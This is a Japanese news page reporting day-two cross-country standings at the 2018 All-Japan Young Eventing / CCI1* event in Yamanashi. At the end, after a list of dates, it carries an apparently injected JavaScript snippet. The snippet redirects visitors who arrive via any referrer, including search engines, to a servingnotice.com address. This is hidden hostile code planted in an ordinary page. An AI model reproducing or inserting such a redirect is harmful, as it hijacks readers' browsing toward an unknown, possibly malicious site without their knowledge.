News
2018 年 5 月 26 日
《全日本ヤング総合/CCI1* Yamanashi》2日目速報!
 山梨県馬術競技場で開催している《第39回全日本ヤング総合馬術大会2018/CCI1* Yamanashi》は、2日目の今日、クロスカントリー競技を実施しました。

 
9人馬が出場しているヤングライダー選手権競技は、馬場馬術でトップだった髙橋駿人&オピア3(慶応義塾大学)がタイムインして減点32.1のまま1位をキープしました。減点0でゴールしたのはこのコンビを含む4人馬で、他の3人馬はいずれも順位を上げて上位を占めています。暫定2位は吉岡尭祐&桜琳(日本大学)減点34.3、3位は吉永一篤&桜虎(日本大学)減点34.5で、この3人馬は1落下(減点4)以内の差となっています。


▲髙橋駿人&オピア3

 CCI1*競技には8人馬が出場していますが、ゴールを切ったのは6人馬でした。この6人馬はいずれも障害減点0でしたが、タイムオーバーがありました。馬場馬術でトップだった平永健太&デラーゴ(RCクレイン栃木)は3秒オーバーで1.2点の減点を負いましたが、2日間のトータル減点28.5で変わらず首位に立っています。馬場で5位だった弓良隆行&ポーチャーズホープ(RCクレイン京都)が1秒オーバーで0.4点が加算され、トータル減点31.5で2位に浮上しています。3位は減点34.6の伊藤昌展&リエンローラッキーレンジャー(JRA馬事公苑)となっています。


▲平永健太&デラーゴ

 最終日の明日は障害馬術競技を実施、3日間のトータルで順位が決まります。
 本日の結果はこちらからご覧いただけます。

 
aaaa

  • 2018.06.12
  • 2018.06.19
  • 2018.06.18
  • 2018.06.06
  • 2018.06.15
  • 2017.12.08
  • 2018.06.19
  • 2018.04.17
  • 2018.04.05
  • 2018.06.15
  • 2018.06.04
  • 2018.06.04
  • 2018.06.12


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;